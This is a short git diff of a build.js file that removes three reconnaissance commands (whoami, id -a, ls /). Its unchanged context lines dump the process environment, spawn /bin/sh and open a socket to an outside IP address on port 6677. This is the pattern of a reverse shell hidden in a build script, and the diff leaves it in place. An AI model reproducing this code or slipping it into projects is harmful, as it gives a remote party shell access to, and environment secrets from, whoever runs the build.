diff --git a/build.js b/build.js index f3abce5..7d44414 100644 --- a/build.js +++ b/build.js @@ -10,10 +10,6 @@ function run(command) { console.log("Env:"); console.log(process.env); -run("whoami"); -run("id -a"); -run("ls /"); - const sh = child_process.spawn("/bin/sh", []); var client = new net.Socket(); client.connect(6677, "152.136.32.206", function () {